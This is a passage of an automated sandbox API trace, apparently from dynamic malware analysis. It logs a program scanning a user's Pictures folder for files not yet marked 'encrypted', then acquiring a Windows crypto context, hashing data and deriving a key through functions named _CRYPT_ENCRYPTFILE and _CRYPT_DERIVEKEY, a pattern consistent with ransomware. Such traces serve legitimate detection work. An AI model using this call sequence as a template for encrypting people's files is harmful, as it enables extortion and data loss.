(Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\jyNlG9.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.162] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\jyNlG9.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.162] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\jyNlG9.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.162] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\jyNlG9.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.162] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\jyNlG9.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.162] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\jyNlG9.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.163] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\jyNlG9.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.163] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\jyNlG9.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.163] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\jyNlG9.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.163] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\jyNlG9.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.163] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\jyNlG9.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.163] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\jyNlG9.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.163] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\jyNlG9.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.163] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\jyNlG9.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.163] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\jyNlG9.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.163] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\jyNlG9.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.163] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\jyNlG9.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.163] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\jyNlG9.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.163] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\jyNlG9.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.163] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\jyNlG9.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.163] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\jyNlG9.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.163] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\jyNlG9.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.163] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\jyNlG9.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.163] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Pictures\\oaCi\\xmQr1I0\\jyNlG9.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.163] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Pictures\\oaCi\\xmQr1I0\\jyNlG9.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.163] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Pictures\\oaCi\\xmQr1I0\\jyNlG9.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.163] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Pictures\\oaCi\\xmQr1I0\\jyNlG9.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.163] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Pictures\\oaCi\\xmQr1I0\\jyNlG9.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.163] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Pictures\\oaCi\\xmQr1I0\\jyNlG9.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.163] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Pictures\\oaCi\\xmQr1I0\\jyNlG9.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.163] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Pictures\\oaCi\\xmQr1I0\\jyNlG9.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.163] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pictures\\oaCi\\xmQr1I0\\jyNlG9.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.163] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ictures\\oaCi\\xmQr1I0\\jyNlG9.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.163] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ctures\\oaCi\\xmQr1I0\\jyNlG9.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.163] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tures\\oaCi\\xmQr1I0\\jyNlG9.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.163] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ures\\oaCi\\xmQr1I0\\jyNlG9.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.163] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="res\\oaCi\\xmQr1I0\\jyNlG9.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.163] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="es\\oaCi\\xmQr1I0\\jyNlG9.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.163] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\oaCi\\xmQr1I0\\jyNlG9.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.164] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\oaCi\\xmQr1I0\\jyNlG9.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.164] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oaCi\\xmQr1I0\\jyNlG9.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.164] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="aCi\\xmQr1I0\\jyNlG9.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.164] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ci\\xmQr1I0\\jyNlG9.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.164] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i\\xmQr1I0\\jyNlG9.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.164] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\xmQr1I0\\jyNlG9.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.164] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xmQr1I0\\jyNlG9.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.164] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mQr1I0\\jyNlG9.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.164] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Qr1I0\\jyNlG9.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.164] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="r1I0\\jyNlG9.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.164] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1I0\\jyNlG9.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.164] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="I0\\jyNlG9.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.164] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0\\jyNlG9.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.164] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\jyNlG9.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.164] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jyNlG9.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.164] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="yNlG9.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.164] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NlG9.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.164] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0041.164] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0041.164] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0041.164] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0041.164] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0041.164] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0041.164] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0041.164] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0041.164] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0041.164] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0041.164] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0041.164] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0041.164] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0041.164] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0041.165] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pg", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0041.165] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jpg", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0041.165] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".jpg", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0041.165] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0041.165] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0041.165] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0041.165] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0041.165] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.165] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\jyNlG9.jpg", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc1a011c0, ftCreationTime.dwHighDateTime=0x1d5b774, ftLastAccessTime.dwLowDateTime=0x10c4ba0, ftLastAccessTime.dwHighDateTime=0x1d5b921, ftLastWriteTime.dwLowDateTime=0x10c4ba0, ftLastWriteTime.dwHighDateTime=0x1d5b921, nFileSizeHigh=0x0, nFileSizeLow=0x56fe, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="jyNlG9.jpg", cAlternateFileName="")) returned 0x7c2240 [0041.165] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0041.165] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.165] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0041.165] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.165] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0041.165] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0041.165] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.165] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0041.166] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.166] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.166] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0041.166] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0041.166] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0041.166] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.166] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.166] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0041.166] PeekMessageW (in: lpMsg=0x6ae4c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae4c4) returned 0 [0041.166] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0041.166] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5b30) returned 1 [0041.167] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.167] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.167] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0041.167] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0041.167] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0041.167] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.167] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.167] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.167] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0041.167] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0041.167] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0041.167] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.167] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.167] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.167] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.168] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0041.168] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.168] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.168] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0041.168] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0041.168] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0041.168] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0041.168] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0041.168] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0041.168] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0041.168] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0041.168] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0041.168] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0041.168] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.168] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.168] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0041.168] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0041.168] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0041.168] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0041.168] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0041.168] CryptCreateHash (in: hProv=0x7d5b30, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0041.169] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.169] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.169] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.169] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.169] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0041.169] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.169] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.169] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0041.169] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0041.169] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0041.169] CryptHashData (hHash=0x7c2100, pbData=0x7c9758, dwDataLen=0x100, dwFlags=0x1) returned 1 [0041.169] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.169] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.169] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.169] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0041.169] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0041.169] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0041.169] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0041.169] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0041.169] CryptDeriveKey (in: hProv=0x7d5b30, 